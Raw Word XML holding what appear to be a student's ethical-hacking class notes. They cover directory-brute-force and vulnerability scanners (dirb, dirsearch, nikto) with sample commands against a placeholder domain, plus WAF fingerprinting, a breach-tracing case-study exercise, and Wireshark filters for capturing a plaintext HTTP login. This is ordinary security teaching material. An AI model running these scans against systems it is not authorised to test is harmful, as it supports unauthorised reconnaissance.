      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>time consuming</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> process with google and google dorks and so we go for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>softwares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000002E9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002EA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>softwares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we have wordlist - which is very important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002EB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002EC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DIrb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has inbuilt 4000+ keywords in its wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002ED" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002EE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://abc.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002EF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002F0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DIRSEARCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002F1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- More number of wordlist and more options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002F2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>#./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>dirsearch.py -u abc.com -e* -t 80 -x 400,403,404,500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002F3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002F4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will search for a particular vulnerability - vulnerable directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002F5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002F6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>NIKTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002F7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- performs 6000 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for all vulnerabilities present in the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002F8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002F9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -host abc.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002FA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002FB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>WAFWOOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002FC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Identifies and fingerprints web application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firwall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002FD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002FE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>LYNIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002FF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- host based auditing tool to evaluate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and mac </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000300" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>lynis</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> audit system --quick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000301" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000302" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>RAPID SCAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000303" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000304" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NETSPARKER</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000305" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>NESSUS</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- PAID TOOL - 2.5 LAKHS / YEAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000306" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000307" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Case Study</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000308" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Wednesday 25th, July, 2.30 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a.m</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ICICI bank website was attacked, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000309" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>causing loss of 1 lakh customer credentials along with card details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000030A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">After forensics investigation, they traced back to the hacker IP, but there were 2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>IP’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of the hacker - out of which only 1 is true IP and other IP is fake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000030B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000030C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>51.105.54.20</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>abc.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000030D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>23.23.231.187</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>xyz.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000030E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Hint - The attacker server is NGINX with Java Server Page Engine 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000030F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000310" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO FIND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000311" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000312" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. The domains/websites linked with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>these 2 IP address</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00000313" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. Any emails linked with the 2 IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000314" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>info@abc.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000315" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>admin@xyz.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000316" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">3. Location of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>these two IP address</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (not server location, but physical office location/address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000317" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. Out of these two, which is the Hackers IP &amp; how can you prove that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000318" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">(Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and hint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000319" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000031A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000031B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>D. BUG BOUNTY WEBSITES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000031D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000031E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000031F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>25-09-2021, SATURDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000320" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000321" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>NETWORK TRAFFIC ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000322" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000323" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">TOOLS - Wireshark, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Network Miner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000324" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000325" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>WIRESHARK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000326" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Best tool for traffic analysis,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000327" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Will analyse incoming and outgoing packets from your computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000328" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Mostly in corporate scenario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>implmented</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/install in server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000329" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not a security device - it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>doesnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prevent any attack from happening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Traffic can be saved </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>under .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Extension (Packet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CAPture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Traffic can be saved based on Time or Size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000032D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000032E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Usage of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000032F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- It helps in monitoring all users traffic in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000330" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- In case of an attack, it can help in understanding how the attack happened, who was responsible... also has its application in network forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000331" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> like a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cctv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> camera)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000332" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000333" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Types of packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000334" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>GET &amp; POST packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000335" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- When it comes to websites, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all get and post packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000336" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>GET - we are getting something from the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000337" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Ex: www.abc.com/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000338" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We are getting login page from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000339" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000033A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>POST - We enter few details and post it to webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000033B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ex?:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we enter username and password and click on login which gets posted to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000033C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000033D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Filter Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000033E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Your computer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is 192.168.0.105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000033F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000340" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>==192.168.0.105 (will display all packets which goes out of our comp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000341" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>==192.168.0.105 (will display all packets which is received by our comp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000342" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">==192.168.0.105 (will display all packets which has our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000343" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000344" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http.request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000345" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tcp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>==80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000346" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000347" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000348" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000349" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. Analyse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3 way</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> handshake for your target website in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000034A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a login page of a http website - turn on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> username and password, click login - analyse / find the username and password packet in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000034B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000034C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000034D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000034E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000034F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000350" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000351" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000352" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000353" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000354" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000355" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000356" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000357" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000358" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000359" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000035A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000035B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
